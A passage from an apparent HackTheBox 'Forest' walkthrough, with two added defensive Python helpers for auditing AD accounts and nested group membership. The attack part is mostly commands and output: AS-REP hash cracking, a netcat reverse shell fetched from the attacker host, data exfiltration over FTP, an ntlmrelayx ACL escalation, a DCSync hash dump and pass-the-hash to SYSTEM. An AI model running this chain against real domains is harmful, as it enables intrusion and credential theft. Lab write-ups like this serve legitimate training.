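    {"sAMAccountName": "old-svc",      "userAccountControl": 0x200 | 0x2 | 0x400000},
    {"sAMAccountName": "kiosk",        "userAccountControl": 0x200 | 0x20},
]


if __name__ == "__main__":
    for r in SAMPLE_USERS:
        print(f"{r['sAMAccountName']:14} {r['userAccountControl']:#010x} {decode_uac(r['userAccountControl'])}")
    print("AS-REP roastable:", asrep_roastable(SAMPLE_USERS))
    for account, finding in hygiene_findings(SAMPLE_USERS):
        print(f"[!] {account}: {finding}")
```

Against a real domain the records would come from an LDAP query of userAccountControl on user objects; the decoding and the checks stay the same.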

[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
---snip---
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e:s3rvice
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 -> pommiey4632@hotmail.com
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16

So apparently svc-alfresco’s password is s3rvice. The next thing I did was tweak the WinRM shell I made earlier for Hackthebox – Heist to include the correct username, password and IP address:

require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.161:5985/wsman',
  user: 'svc-alfresco',
  password: 's3rvice',
)

command = ""
output = nil

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    print "PS > "
    # treat EOF (Ctrl-D) as "exit" instead of looping forever on nil
    command = gets || "exit\n"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}" if output
end

and run it to get shell access.

root@kalivm:~/Forest# ruby shell.rb 
PS > whoami
htb\svc-alfresco

All that is left is to grab the user flag and start escalating privileges.

PS > type ..\Desktop\user.txt
e5e4*****d9ed

Privilege Escalation

The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe

PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950 20191025120253_BloodHound.zip
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1

After the SharpHound script and binary are transferred, I run them as the user svc-alfresco and the script produces a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way, which I learned during my OSCP journey, is to create and run an FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)): 
put 20191025120253_BloodHound.zip
quit

Of course, this approach requires an active FTP server on my attacker machine, which can easily be done with Python:

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).

Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.

In BloodHound’s overview of the shortest path to Domain Admins, I see that a user who is part of the ‘Exchange Windows Permissions’ group has the ability to write the ACL of the entire HTB.local domain, which ultimately gives access to, for example, the password hashes. I can also see that the svc-alfresco user has GenericAll permissions on that particular group through its nested memberships of `Service Accounts`, `Privileged IT Accounts` and `Account Operators`.

PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

When you add the svc-alfresco account to the ‘Exchange Windows Permissions’ group, it is removed again after a few minutes, which is quite a pain. So I decided to add my own user to the domain with the same password as user svc-alfresco and add it to the group `Exchange Windows Permissions`. However, after that I was stuck for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing me to the next step!
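The nested path BloodHound surfaced (svc-alfresco is in Service Accounts, which is in Privileged IT Accounts, which is in Account Operators) is why a direct-membership check on Account Operators would have missed this account, and why the cleanup job that keeps removing svc-alfresco from Exchange Windows Permissions does not help against a freshly created user. Added example, not code from the writeup: it resolves transitive group membership the way BloodHound does and reports which users reach a high-value group. The edge list is constructed from what the writeup states; the Privileged IT Accounts to Account Operators edge is the one BloodHound showed, sedje is the account created above, and the high-value group list is an assumption.

```python
from collections import deque

# Added example, not code from the writeup. Resolves nested AD group membership
# and flags users who reach a high-value group. Edges are constructed from the
# memberships the writeup mentions.

# principal -> set of groups it is a *direct* member of (constructed)
MEMBER_OF = {
    "svc-alfresco": {"Service Accounts", "Domain Users"},
    "Service Accounts": {"Privileged IT Accounts"},
    "Privileged IT Accounts": {"Account Operators"},
    "sedje": {"Exchange Windows Permissions", "Domain Users"},
    "Exchange Windows Permissions": set(),
    "Account Operators": set(),
    "Domain Users": set(),
}
USERS = ("svc-alfresco", "sedje")

# groups whose (effective) membership should be alerted on (assumption)
HIGH_VALUE_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Account Operators",
    "Exchange Windows Permissions",
}


def effective_groups(principal, member_of=MEMBER_OF):
    """All groups `principal` belongs to, directly or through nesting.

    Breadth-first over the memberOf edges with a visited set, so circular
    nesting (which AD allows) cannot loop forever."""
    seen = set()
    queue = deque(member_of.get(principal, ()))
    while queue:
        group = queue.popleft()
        if group in seen:
            continue
        seen.add(group)
        queue.extend(member_of.get(group, ()))
    return seen


def membership_path(principal, target, member_of=MEMBER_OF):
    """Shortest chain [principal, group, ..., target], or None if unreachable."""
    queue = deque([[principal]])
    visited = {principal}
    while queue:
        path = queue.popleft()
        for group in sorted(member_of.get(path[-1], ())):
            if group == target:
                return path + [group]
            if group not in visited:
                visited.add(group)
                queue.append(path + [group])
    return None


def high_value_members(member_of=MEMBER_OF, users=USERS, high_value=HIGH_VALUE_GROUPS):
    """Map each high-value group to the users that reach it; empty groups are omitted."""
    report = {}
    for group in sorted(high_value):
        reaching = sorted(u for u in users if group in effective_groups(u, member_of))
        if reaching:
            report[group] = reaching
    return report


if __name__ == "__main__":
    for group, members in high_value_members().items():
        for user in members:
            print(f"{group}: {user} via {' -> '.join(membership_path(user, group))}")
```

Run against a real directory, the edge list would be built from each group's member attribute; the point of the traversal is that a periodic review of direct members of Account Operators or Exchange Windows Permissions is not enough, the effective membership is what matters.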

root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the localhost listener and provide valid credentials; ntlmrelayx will do all the hard work and change the permissions for me. I open a browser to localhost and provide the sedje credentials.

[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And ntlmrelayx.py already tells me what to do: sedje now has the right permissions to continue with secretsdump.py.

root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---

secretsdump.py gives me all the hashes in the domain, including the Administrator’s NT hash, which I can pass to psexec.py:

root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc

Author: Puckiestyle

Protected: HTB-POSTMAN-NL
